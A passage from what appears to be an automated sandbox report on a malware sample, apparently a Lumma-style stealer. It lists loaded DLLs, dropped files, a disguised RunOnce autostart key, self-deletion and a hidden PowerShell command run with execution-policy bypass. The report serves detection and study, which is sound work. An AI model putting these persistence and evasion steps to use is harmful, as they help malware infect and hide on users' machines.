                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: windows.storage.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wldp.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: profapi.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: dwrite.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: windowscodecs.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: textshaping.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: mpr.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: textinputframework.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: coreuicomponents.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: ntmarta.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: coremessaging.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wintypes.dll
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeSection loaded: wintypes.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winhttp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: webio.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winnsi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: sspicli.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: schannel.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: msasn1.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: gpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: dpapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: amsi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: userenv.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: profapi.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: version.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32Jump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                  Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: softy.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 0000000E.00000002.2706105355.0000020F4C353000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: rust_dave_sideload.pdb source: g2m.dll.14.dr
                  Source: Binary string: BitLockerToGo.pdb source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555218278.00000298FAF70000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C00084E000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555066474.00000298FAFB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb& source: powershell.exe, 0000000E.00000002.2663864981.0000020F351B0000.00000004.00000800.00020000.00000000.sdmp, lm.exe.14.dr
                  Source: Binary string: softy.pdbat} source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbm source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: *n.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C2B2000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: ndll\mscorlib.pdbu0 source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: System.IO.Compression.pdb source: powershell.exe, 0000000E.00000002.2706536485.0000020F4C388000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: BitLockerToGo.pdbGCTL source: 60FC.exe, 00000008.00000002.2594291033.000000C000400000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555218278.00000298FAF70000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C000800000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000002.2595446513.000000C00084E000.00000004.00001000.00020000.00000000.sdmp, 60FC.exe, 00000008.00000003.2555066474.00000298FAFB0000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: ll\mscorlib.pdb source: powershell.exe, 0000000E.00000002.2703886796.0000020F4C210000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb5 source: powershell.exe, 0000000E.00000002.2706105355.0000020F4C353000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: c:\p4builds\Products\GoToMeeting\v5.4_builds\output\G2M_Exe.pdb source: powershell.exe, 0000000E.00000002.2663864981.0000020F351B0000.00000004.00000800.00020000.00000000.sdmp, lm.exe.14.dr

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.wexubof:R;.lixoweg:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\sbttifbUnpacked PE file: 5.2.sbttifb.400000.0.unpack .text:ER;.rdata:R;.data:W;.wexubof:R;.lixoweg:W;.rsrc:R; vs .text:EW;
                  Suspicious powershell command line found
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1"
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File "C:\Users\user\AppData\Local\Temp\rentry-script.ps1" Jump to behavior
                  Source: file.exeStatic PE information: section name: .wexubof
                  Source: file.exeStatic PE information: section name: .lixoweg
                  Source: 60FC.exe.1.drStatic PE information: section name: .xdata
                  Source: sbttifb.1.drStatic PE information: section name: .wexubof
                  Source: sbttifb.1.drStatic PE information: section name: .lixoweg
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00403230 push eax; ret 0_2_00403302
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004026FF push ecx; ret 0_2_0040270B
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_026E168F push esi; retf 0_2_026E16BC
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_026E2766 push ecx; ret 0_2_026E2772
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0273694F pushad ; retf 0_2_027369C8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02736930 pushad ; retf 0_2_027369C8
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027351E3 push edi; retf 0_2_027351EE
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027355C8 push ss; retf 0_2_0273559A
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_027351A9 push edi; retf 0_2_027351EE
                  Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02735587 push ss; retf 0_2_0273559A
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_00403230 push eax; ret 5_2_00403302
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_004026FF push ecx; ret 5_2_0040270B
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_0250168F push esi; retf 5_2_025016BC
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_02502766 push ecx; ret 5_2_02502772
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F76F0 pushad ; retf 5_2_026F7788
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F5F69 push edi; retf 5_2_026F5FAE
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F6347 push ss; retf 5_2_026F635A
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F770F pushad ; retf 5_2_026F7788
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F5FA3 push edi; retf 5_2_026F5FAE
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F99B1 pushfd ; ret 5_2_026F99C6
                  Source: C:\Users\user\AppData\Roaming\sbttifbCode function: 5_2_026F6388 push ss; retf 5_2_026F635A
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB0DFE push eax; retf 10_2_00007FFD9BAB0E1D
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB0DD5 push eax; ret 10_2_00007FFD9BAB0DFD
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 10_2_00007FFD9BAB0D55 push eax; ret 10_2_00007FFD9BAB0DFD
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD0DFE push eax; retf 12_2_00007FFD9BAD0E1D
                  Source: C:\Users\user\AppData\Local\Temp\6BC6.exeCode function: 12_2_00007FFD9BAD0DD5 push eax; ret 12_2_00007FFD9BAD0DFD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BACFAA4 pushad ; iretd 14_2_00007FFD9BACFB01
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BACF931 push eax; ret 14_2_00007FFD9BACFAA1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BAC812B push ebx; ret 14_2_00007FFD9BAC816A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 14_2_00007FFD9BACD643 push ebx; iretd 14_2_00007FFD9BACD76A
                  Source: file.exeStatic PE information: section name: .text entropy: 7.779881885510723
                  Source: sbttifb.1.drStatic PE information: section name: .text entropy: 7.779881885510723
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\g2m.dllJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6BC6.exeJump to dropped file
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sbttifbJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6267.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\60FC.exeJump to dropped file
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\sbttifbJump to dropped file

                  Boot Survival

                  barindex
                  Creates autostart registry keys with suspicious names
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUYJump to behavior
                  Source: C:\Windows\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update#8984_8yUscnjrUYJump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Deletes itself after installation
                  Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                  Hides that the sample has been downloaded from the Internet (zone.identifier)
                  Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\sbttifb:Zone.Identifier read attributes | deleteJump to behavior
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
